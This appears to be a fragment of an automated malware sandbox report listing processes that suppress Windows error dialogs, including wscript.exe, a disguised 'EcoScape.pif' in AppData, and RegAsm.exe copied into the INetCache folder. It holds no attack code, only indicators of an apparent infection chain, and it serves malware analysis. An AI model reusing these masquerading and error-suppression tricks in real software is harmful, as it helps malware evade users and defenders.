Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|